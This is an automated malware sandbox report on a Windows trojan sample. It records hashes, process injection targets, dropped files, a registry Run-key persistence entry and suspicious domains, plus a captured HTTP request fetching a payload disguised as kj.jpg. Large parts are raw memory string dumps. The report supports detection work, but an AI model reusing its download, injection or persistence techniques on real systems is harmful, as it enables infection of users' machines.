Gen.Variant.MSIL.Mensa.11_b9f21a7b8e
HEUR:Trojan.MSIL.Generic (Kaspersky), Gen:Variant.MSIL.Mensa.11 (B) (Emsisoft), Gen:Variant.MSIL.Mensa.11 (AdAware), GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: b9f21a7b8ec27d20f13394ff06dde8a0
SHA1: ce9392a2db9a5dcc5e79ba650b96ee96f25ad57e
SHA256: 60f27a1fec2cbc81409aa38482e0a9a5d920ae373455692d89a7d183a1f7cfee
SSDeep: 49152:xrhgu8sxyQVbFwd0Sp7XyTz0lb5gfExPatECnFUxl3mAbnfu0YIsgi68ebKsYQSm:9hN8sZBFe0S0TEb6QZhmAT468NsUzt
Size: 4075520 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-26 08:27:03
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WerFault.exe:1952
wermgr.exe:2556
Noodles V1.1.exe:264
Speed Hook.bat:520
Speed Hook.bat:3732
svshost.bat:2924
NKI.exe:3568
vbc.exe:3520
The Trojan injects its code into the following process(es):
Noodles V1.1.exe:3712
Speed Hook.bat:1464
iexplore.exe:2936
iexplore.exe:2484
svchost.exe:2896
SearchProtocolHost.exe:2144
SearchFilterHost.exe:4020
csrss.exe:320
wininit.exe:360
csrss.exe:368
winlogon.exe:416
services.exe:460
lsass.exe:468
lsm.exe:476
svchost.exe:580
svchost.exe:648
svchost.exe:700
svchost.exe:824
svchost.exe:864
taskhost.exe:872
svchost.exe:1048
svchost.exe:1156
spoolsv.exe:1244
svchost.exe:1280
Dwm.exe:1376
Explorer.EXE:1440
wmiprvse.exe:1468
conhost.exe:1648
TPAutoConnSvc.exe:1676
svchost.exe:1732
TPAutoConnect.exe:2160
conhost.exe:2168
SearchIndexer.exe:2228
svchost.exe:2560
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process WerFault.exe:1952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Temp\WER6B71.tmp.hdmp (758423 bytes)
C:\Windows\Temp\WER695D.tmp.WERInternalMetadata.xml (53022 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER6D65.tmp.mdmp (3073 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER695D.tmp.WERInternalMetadata.xml (3 bytes)
C:\Windows\Temp\WER67F5.tmp.appcompat.txt (698 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\Report.wer (182296 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER67F5.tmp.appcompat.txt (2 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\WER6B71.tmp.hdmp (37269 bytes)
C:\Windows\Temp\WER6D65.tmp.mdmp (151168 bytes)
The Trojan deletes the following file(s):
C:\Windows\Temp\WER6B71.tmp.hdmp (0 bytes)
C:\Windows\Temp\WER695D.tmp.WERInternalMetadata.xml (0 bytes)
C:\Windows\Temp\WER695D.tmp (0 bytes)
C:\Windows\Temp\WER6B71.tmp (0 bytes)
C:\Windows\Temp\WER67F5.tmp.appcompat.txt (0 bytes)
C:\Windows\Temp\WER67F5.tmp (0 bytes)
C:\Windows\Temp\WER6D65.tmp.mdmp (0 bytes)
C:\Windows\Temp\WER6D65.tmp (0 bytes)
The process wermgr.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d\Report.wer.tmp (189000 bytes)
The process Noodles V1.1.exe:3712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xSpeed.sys (48 bytes)
The process Noodles V1.1.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svshost.bat (1588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Noodles V1.1.exe (32128 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1mgr.exe (274 bytes)
The process Speed Hook.bat:1464 makes changes in the file system.
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svshost.bat (0 bytes)
The process svshost.bat:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Microsoft Fkfygh\Speed Hook.bat (70 bytes)
%Program Files%\AppPatch\kj.dll (119337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kj[1].jpg (116081 bytes)
The process NKI.exe:3568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\EFAXWW\NKI.02 (57 bytes)
C:\ProgramData\EFAXWW\NKI.01 (81 bytes)
C:\ProgramData\PEZ\NKI.004 (7320 bytes)
The process vbc.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ProgramData\EFAXWW\NKI.exe (148 bytes)
C:\ProgramData\EFAXWW\NKI.02 (55 bytes)
C:\ProgramData\EFAXWW\NKI.01 (81 bytes)
C:\ProgramData\EFAXWW\NKI.00 (2 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1.exe (1521 bytes)
Registry activity
The process WerFault.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\LruList\0000000000000577]
"ObjectId" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\ObjectTable\147\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000055E1" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\ObjectTable\147]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\LruList\0000000000000577]
"ObjectLru" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\ObjectTable\147]
"_Usn_" = "Type: REG_QWORD, Length: 8"
[HKU\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\ObjectTable\147]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\LruList]
"CurrentLru" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore]
"_CurrentObjectId_" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "05 00 00 C0 00 00 00 00 00 00 00 00 00 00 00 00"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\ObjectTable\147]
"_FileId_" = "Type: REG_QWORD, Length: 8"
[\REGISTRY\A\{686941E9-946F-11E6-8ABA-0050563CAC71}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000055E1]
"147" = "Type: REG_QWORD, Length: 8"
The process wermgr.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d"
[HKCU\Software\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Speed Hook.bat_5742fda22970a3feda1f8aed145a339bd73dc92f_cab_07a56e0d"
The process Noodles V1.1.exe:3712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The process Noodles V1.1.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Speed Hook.bat:1464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\Wskdll qyfjwuih]
"MarkTime" = "2017-09-05 09:00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie\devenum]
"Version" = "7"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\services\Wskdll qyfjwuih]
"DeleteFiles"
The process Speed Hook.bat:520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\Wskdll qyfjwuih]
"Description" = "¼à²âºÃ¼àÊÓÃÂÂÓ²¼þÉ豸²¢×Ãâ€Ã‚¶Â¯Â¸Ã¼ÃÂÂÉ豸Çý¶¯¡£"
"ConnectGroup" = "CF·ÆÂɱö"
The process svshost.bat:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\System\CurrentControlSet\services\Wskdll qyfjwuih]
"DeleteFiles" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\svshost.bat"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svshost_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process NKI.exe:3568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NKI Start" = "C:\ProgramData\EFAXWW\NKI.exe"
The process vbc.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
| MD5 | File path |
|---|---|
| 5dbc99ff17d4869a521d4f88bf3672cf | c:\Program Files\Microsoft Fkfygh\Speed Hook.bat |
| c3fd0cd65ed63f682a5bf98aa90e774f | c:\ProgramData\EFAXWW\NKI.01 |
| 252baa375c71366581961e3386d3834b | c:\ProgramData\EFAXWW\NKI.02 |
| 2bafb32eee4371dfea195eac8e1cb926 | c:\ProgramData\EFAXWW\NKI.exe |
| c3fd0cd65ed63f682a5bf98aa90e774f | c:\Users\All Users\EFAXWW\NKI.01 |
| 252baa375c71366581961e3386d3834b | c:\Users\All Users\EFAXWW\NKI.02 |
| 2bafb32eee4371dfea195eac8e1cb926 | c:\Users\All Users\EFAXWW\NKI.exe |
| b54f3ae6afb13570b0ba89b3fee02b6d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Noodles V1.1.exe |
| 8263d0e0f97897febdaf2a8956a6a88b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\xSpeed.sys |
| 457e3abd051b1878f70ea7d550adc36f | c:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1.exe |
| ebc35bf5774a4b75cd45638cecb74db3 | c:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1mgr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 4061156 | 4063232 | 5.52996 | 43e16f6bc3e5ddc1a4f4c57a67399487 |
| .rsrc | 4071424 | 16 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
| .reloc | 4079616 | 12 | 4096 | 0.011373 | 579b8e0c948e1f37892fee079915a83d |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://mm.cnxc.tk/mm/kj.jpg | |
| yk.cnxc.tk | |
| google.com | |
| supnewdmn.com | |
| tvrstrynyvwstrtve.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE User-Agent (Mozilla/4.0 (compatible))
ET POLICY HTTP Request to a *.tk domain
Traffic
GET /mm/kj.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: mm.cnxc.tk
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 245792
Accept-Ranges: bytes
Server: HFS 2.3k
Set-Cookie: HFS_SID_=0.912671110592782; path=/; HttpOnly
ETag: 09E858A2E48772EDC1B6A51ADC70146A
Last-Modified: Sat, 12 Aug 2017 03:02:07 GMT
Content-Disposition: filename="kj.jpg";'.....c.&?R......Z.B.S..'........_.`......9!..-C.Bqz9...Vb!..g.gW./...
.l-..=y$....7.TO.A..zn.....l...oJ.U.....f....C...f#.........e....~.F.
`..V..]..2lw._..($e........^..U......h....YBb...a.Q...q..R....)....0..
.[f.t<`I D$>....f..8.P.d....UB4%(.~....6.8Z......~.@.........._,
.v4...C.}.g..ru.^.3,Z.i...A3..~o..PX.3n>..=H.]..~..=.....:.S...4...
l...)..3.}.:.|.ZPn.9.#.l........7z......B.^u!!V.O..v....E.GM..p..\c.9o
..._..............1&....../..8..I.E......x....._.Vx.{.M.........t.4"..
.J................].e/?..9O........-..r.....uB......Qs.............p&g
t;.... ...._Y.<......Z...{...}.T'.A2.E.W%.....'.RY.}..h:-.-....5Ade
......R.p.....but...9.>....v!.l....$]...........,....&..f..q...;e..
.~...,.'C.....z,G.V....tn....&.O......R..=.wc.ILF/..*..By.....S....}.
..o...e....L.'.........K..o.J..32.w..M....{.v.q.?....Aq..5...y.6sG....
R=......Nj.T.E.:.J.;(7.j.......~p.......H.H..k...`b..A..VP.w.....d*..T
J..5O0Yq.Z./.yMO8..2..I...s..x.......h ..7..X..-.$./.S..y.(.....XBf...
bI&. _...&.@...W..d.-Y8..~n.I5..Wyu....R..E...R ..g.= .AO..n:.<....
a..w...=m.b..'...=.e........SZ.2..u.X.bz...........C._..8...l.T.K\...s
.v.2.#u.b.(q..uz....t..L..9...Y..S9.}.%.GzL.T...k4.....D.......B..:.7J
7.E....a.....c.......m>.,.......k......9.'...68-...V....\.e...[....
Qz.]..u.A......A.O.[^.P... .[...c.#J ...U.I.8'ff...E9...}........kc..B
y.......P0..n....'JU...E..}..Y.. `:.m'r....M..@.b0G...[4!N.l.c.3..0...
.%.s.Z>u.....yi..9H~4.'.........w......Z.....xt..u..........J..Yl..
.. ..Sd........jx.f....8R...Q...},...I....:..TY'...... x....!.#L..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_2936_rwx_00180000_00001000:
wC:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1mgr.exe
iexplore.exe_2936_rwx_20010000_0000E000:
.text
.rdata
@.data
.reloc
Jmgr.exe
kernel32.dll
GetWindowsDirectoryA
iexplore.exe_2484:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_2484_rwx_00180000_00001000:
wC:\Windows\Microsoft.NET\Framework\v2.0.50727\Noodles V1.1mgr.exe
iexplore.exe_2484_rwx_20010000_00001000:
.text
`.rdata
@.data
.reloc
Noodles V1.1.exe_3712:
.text
`.rdata
@.data
.rsrc
FtpSL
t$(SSh
~%UVW
u$SShe
iu2.iu
K(.wS
User32.dll
user32.dll
Kernel32.dll
kernel32.dll
Winmm.dll
advapi32.dll
GetAsyncKeyState
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
sSHIPM[u
}~~}||{|{}~~~}}}~~
~}{{||}~~~|}{|}~~|{{{{|}~~}|{{||}~~}}}|}}~~
~~}}}}~~
.VXTN)
\.ct}
c\xSpeed.sys
h.rdata
H.data
.pdata
.reloc
E:\Project\xSpeed
\xSpeed\x64\Win7Release\x64.pdb
KeDelayExecutionThread
ntoskrnl.exe
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
\xSpeed\Win7Release\x86.pdb
HAL.dll
@User32.dll
HotKey
Value_Hotkey
HotKey On/off
HotKey_rec
Hotkey_down
HotKey_UP
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
GetViewportOrgEx
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
WS2_32.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Noodles V1.1.exe
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" 